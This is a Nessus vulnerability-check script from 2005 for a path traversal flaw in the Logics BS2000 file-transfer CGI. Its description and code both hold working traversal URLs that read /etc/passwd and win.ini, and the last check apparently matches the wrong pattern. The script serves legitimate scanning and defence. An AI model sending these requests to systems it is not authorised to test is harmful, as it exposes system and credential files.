#
# (c) Chase The Sun, Roman Ramirez <rramirez@chasethesun.es>
#

if(description)
{
   script_id(90000);
   script_bugtraq_id(12998);
   script_cve_id("CAN-2005-1002");
   script_version ("$Revision: 1.0 $");
   
   name["english"] = "Logics Software Filetransfer from BS2000 Host to Web Client Access Validation Error";
   script_name(english:name["english"]);
 
   desc["english"] = "
  Without authentication nor authorization it is possible to exploit 
  'File Transfer from BS2000 Host to Web Client' just replacing the
  variables VAR_FT_*; VAR_FT_LANG manages the language that will be used 
  for templates and VAR_FT_TMPL manages the template to be used.

  Replacing VAR_FT_LANG with 'c:\' (whatever) and VAR_FT_TMPL with the 
  file we want to read (i.e: winnt/win.ini) we have read acces
  to the resource requested (most files in the filesystem).

  For example, 
  http://www.myserver.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini
  will give us the contents for: 
      c:\winnt\win.ini.

  In UNIX systems you can test the vulnerability just with:
      http://www.myserver.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd

  Nessus has tested for access windows and winnt directories in Microsoft Windows platforms.

Solution : Disable the CGI
Risk factor : High";

   script_description(english:desc["english"]);
 
   summary["english"] = "Determines if can access logwebftbs2000.exe?VAR_FT_LANG=";
   script_summary(english:summary["english"]);
 
   script_category(ACT_GATHER_INFO);
 
   script_copyright(english:"This script is Copyright (C) 2005 Chase The Sun");
   script_family(english:"Misc.", francais:"Divers");
   script_require_ports(80);
 
   exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port ( default:80 );
if (! port )exit(0);

req = http_get(item:"/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if (!  res ) exit(0);
if ( egrep(pattern:'root:', string:res ) ){
	security_hole(port);
}
else{
	req = http_get(item:"/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\winnt&VAR_FT_TMPL=win.ini", port:port);
	res = http_keepalive_send_recv(port:port, data:req);
	if (!  res ) exit(0);
	if ( egrep(pattern:'; for 16-bit app support', string:res ) ){
		security_hole(port);
	}
	else {
		req = http_get(item:"/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\windows&VAR_FT_TMPL=win.ini", port:port);
		res = http_keepalive_send_recv(port:port, data:req);
		if (!  res ) exit(0);
		if ( egrep(pattern:'root:', string:res ) ){
			security_hole(port);
		}
	}
}